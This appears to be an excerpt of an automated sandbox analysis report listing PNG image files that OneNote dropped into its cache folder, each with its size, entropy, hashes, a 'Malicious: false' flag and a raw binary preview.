Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002I.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002J.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002K.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002L.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002M.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002N.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002O.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002P.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002Q.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002R.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002S.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002T.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002U.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002V.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
